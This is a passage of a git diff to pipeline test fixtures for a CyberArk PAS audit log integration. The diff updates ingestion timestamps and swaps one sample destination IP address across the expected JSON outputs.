\u003cIssuer\u003ePSMGw_COMP01\u003c/Issuer\u003e\\n \u003cAction\u003ePartial Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003eAdministrator\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePartial Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 05:20:07\",\"IsoTimestamp\":\"2021-03-25T09:20:07Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"20\",\"Desc\":\"Partial Gateway 
Connection\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_COMP01\",\"Action\":\"Partial Gateway Connection\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Partial Gateway Connection\",\"GatewayStation\":\"\"}}}", "code": "20", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json index 719901aa51e..f91eafda9e4 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "old backup files deletion start", - "ingested": "2021-06-09T10:24:29.286781700Z", + "ingested": "2021-12-09T13:36:40.797519200Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"202\",\"Desc\":\"Old Backup Files Deletion Start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Old Backup Files Deletion Start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Old Backup Files Deletion Start\",\"GatewayStation\":\"\"}}}", "code": "202", "kind": "event" 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json index 377d88abad4..e7b1f09d867 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "old backup files deletion end", - "ingested": "2021-06-09T10:24:29.314784200Z", + "ingested": "2021-12-09T13:36:40.949257400Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"203\",\"Desc\":\"Old Backup Files Deletion End\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Old Backup Files Deletion End\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Old Backup Files Deletion End\",\"GatewayStation\":\"\"}}}", "code": "203", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log index f3949f536de..fe6a126c6cb 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log 
@@ -1,2 +1,2 @@ Apr 07 09:51:42 VAULT {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 22\n CPM Verify Password\n Info\n PasswordManager\n CPM Verify Password\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\n 10.2.0.4\n \n \n \n ImmediateTask\n address=radiussrv.cyberark.local;username=test12;\n CPM Verify Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"22","Desc":"CPM Verify Password","Severity":"Info","Issuer":"PasswordManager","Action":"CPM Verify Password","SourceUser":"","TargetUser":"","IsoTimestamp":"2021-03-16T15:01:00Z","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12","Station":"10.2.0.4","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask","ExtraDetails":"address=radiussrv.cyberark.local;username=test12;","Message":"CPM Verify Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"test12"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastSuccessVerification","Value":"1604943844"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"success"},{"Name":"CreationMethod","Value":"PVWA"}]}}}} -<5>1 2021-03-15T10:22:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:44\n 2021-03-15T10:22:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 22\n CPM Verify Password\n Info\n PasswordManager\n CPM Verify Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask\n address=34.123.103.115;username=testark;\n CPM Verify Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
03:22:44","IsoTimestamp":"2021-03-15T10:22:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"22","Desc":"CPM Verify Password","Severity":"Info","Issuer":"PasswordManager","Action":"CPM Verify Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Verify Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:22:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:44\n 2021-03-15T10:22:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 22\n CPM Verify Password\n Info\n PasswordManager\n CPM Verify Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask\n address=67.43.156.15;username=testark;\n CPM Verify Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:44","IsoTimestamp":"2021-03-15T10:22:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"22","Desc":"CPM Verify Password","Severity":"Info","Issuer":"PasswordManager","Action":"CPM Verify Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask","ExtraDetails":"address=67.43.156.15;username=testark;","Message":"CPM Verify Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json index 84719630fd3..ffafb7bd4ff 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json 
@@ -79,7 +79,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.336761500Z", + "ingested": "2021-12-09T13:36:41.072867800Z", "original": "Apr 07 09:51:42 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e22\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\u003c/File\u003e\\n \u003cStation\u003e10.2.0.4\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=radiussrv.cyberark.local;username=test12;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"test12\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"LastSuccessVerification\\\" Value=\\\"1604943844\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"22\",\"Desc\":\"CPM Verify Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\",\"Station\":\"10.2.0.4\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=radiussrv.cyberark.local;username=test12;\",\"Message\":\"CPM Verify Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"test12\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1604943844\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"}]}}}}", "code": "22", "kind": "event", 
@@ -104,20 +104,11 @@
 }
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "34.123.103.115",
 "user": {
 "name": "testark"
 },
- "ip": "34.123.103.115"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "source": {
 "user": {
@@ -140,7 +131,7 @@
 },
 "@timestamp": "2021-03-15T10:22:44.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark"
+ "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark"
 },
 "ecs": {
 "version": "1.12.0"
@@ -152,7 +143,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "34.123.103.115"
+ "67.43.156.15"
 ]
 },
 "cyberarkpas": {
@@ -160,19 +151,19 @@ "severity": "Info", "reason": "ImmediateTask", "iso_timestamp": "2021-03-15T10:22:44Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:22:44\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:22:44Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e22\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.123.103.115;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" 
Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:22:44\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:22:44Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e22\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.123.103.115" + "address": "67.43.156.15" }, "username": "testark" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -182,7 +173,7 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password", 
@@ -195,8 +186,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.336778300Z", - "original": "\u003c5\u003e1 2021-03-15T10:22:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:22:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:22:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e22\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.123.103.115;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" 
Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:22:44\",\"IsoTimestamp\":\"2021-03-15T10:22:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"22\",\"Desc\":\"CPM Verify Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=34.123.103.115;username=testark;\",\"Message\":\"CPM Verify Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:41.072873500Z", + "original": "\u003c5\u003e1 2021-03-15T10:22:44Z VAULT 
{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:22:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:22:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e22\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" 
